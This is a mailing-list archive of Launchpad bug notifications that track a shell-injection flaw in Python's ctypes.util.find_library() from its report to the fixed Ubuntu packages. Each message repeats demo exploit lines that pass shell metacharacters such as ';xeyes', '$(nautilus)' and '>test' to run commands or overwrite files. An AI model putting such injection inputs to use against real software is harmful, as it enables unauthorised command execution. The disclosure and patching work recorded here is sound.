subject:"\[Touch\-packages\] \[Bug 1512068\] Re\: Python ctypes.util , Shell Injection in find

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2018-01-18 Thread Launchpad Bug Tracker

This bug was fixed in the package python2.7 - 2.7.12-1ubuntu0~16.04.3

---
python2.7 (2.7.12-1ubuntu0~16.04.3) xenial-proposed; urgency=medium

  * Some performance improvements: LP: #1638695.
- Build the _math.o object file without -fPIC for static builds.
  * Rename md5_* functions to _Py_md5_*. Closes: #868366. LP: #1734109.
  * Explicitly use the system python for byte compilation in postinst scripts.
LP: #1682934.
  * Fix issue #22636: Avoid shell injection problems with
ctypes.util.find_library(). LP: #1512068.

 -- Matthias Klose   Mon, 04 Dec 2017 15:50:18 +0100

** Changed in: python2.7 (Ubuntu Xenial)
   Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Fix Released
Status in python2.7 source package in Xenial:
  Fix Released

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2017-12-05 Thread Matthias Klose

exploits don't work anymore in the proposed python2.7 update to xenial.

** Tags removed: verification-needed verification-needed-xenial
** Tags added: verification-done verification-done-xenial

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Fix Released
Status in python2.7 source package in Xenial:
  Fix Committed

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2017-12-04 Thread Łukasz Zemczak

Hello Bernd, or anyone else affected,

Accepted python2.7 into xenial-proposed. The package will build now and
be available at
https://launchpad.net/ubuntu/+source/python2.7/2.7.12-1ubuntu0~16.04.3
in a few hours, and then in the -proposed repository.

Please help us by testing this new package.  See
https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how
to enable and use -proposed.Your feedback will aid us getting this
update out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug,
mentioning the version of the package you tested and change the tag from
verification-needed-xenial to verification-done-xenial. If it does not
fix the bug for you, please add a comment stating that, and change the
tag to verification-failed-xenial. In either case, details of your
testing will help us make a better decision.

Further information regarding the verification process can be found at
https://wiki.ubuntu.com/QATeam/PerformingSRUVerification .  Thank you in
advance!

** Changed in: python2.7 (Ubuntu Xenial)
   Status: New => Fix Committed

** Tags added: verification-needed verification-needed-xenial

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Fix Released
Status in python2.7 source package in Xenial:
  Fix Committed

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2017-11-24 Thread Brian Morton

** Changed in: python2.7 (Ubuntu Xenial)
 Assignee: (unassigned) => Brian Morton (rokclimb15)

** Changed in: python2.7 (Ubuntu)
 Assignee: Brian Morton (rokclimb15) => (unassigned)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Fix Released
Status in python2.7 source package in Xenial:
  New

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2017-11-23 Thread Matthias Klose

fixed in zesty and newer releases

** Also affects: python2.7 (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Changed in: python2.7 (Ubuntu)
   Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Fix Released
Status in python2.7 source package in Xenial:
  New

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-12-13 Thread Brian Morton

Attached is a debdiff for trusty. If someone could please review and
provide feedback, I'll produce additional ones for precise, xenial,
yakkety, and zesty

** Patch added: "Debdiff of modified upstream patch for trusty"
   
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+attachment/4791357/+files/python2.7_2.7.6-8ubuntu0.4.debdiff

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Confirmed

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-12-13 Thread Brian Morton

** Changed in: python2.7 (Ubuntu)
 Assignee: (unassigned) => Brian Morton (rokclimb15)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Confirmed

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-08-05 Thread Marc Deslauriers

** Changed in: python2.7 (Ubuntu)
   Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Confirmed

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-06-18 Thread Bug Watch Updater

** Changed in: python
   Status: New => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  New

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-01-06 Thread Bug Watch Updater

** Changed in: python
   Status: Unknown => New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  New
Status in python2.7 package in Ubuntu:
  New

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-01-05 Thread Brian Murray

** Also affects: python via
   http://bugs.python.org/issue22636
   Importance: Unknown
   Status: Unknown

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Unknown
Status in python2.7 package in Ubuntu:
  New

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2015-11-30 Thread Brian Murray

** Changed in: python2.7 (Ubuntu)
   Importance: Undecided => High

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in python2.7 package in Ubuntu:
  New

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2015-11-30 Thread Dimitri John Ledkov

upstream only fixed this in 3.5 which we do carry, but not other release
series.

It's not that "ubuntu diddn't pick up the fix", it's the upstream that
didn't apply in all applicable release series.

commented on your bug report.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in python2.7 package in Ubuntu:
  New

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
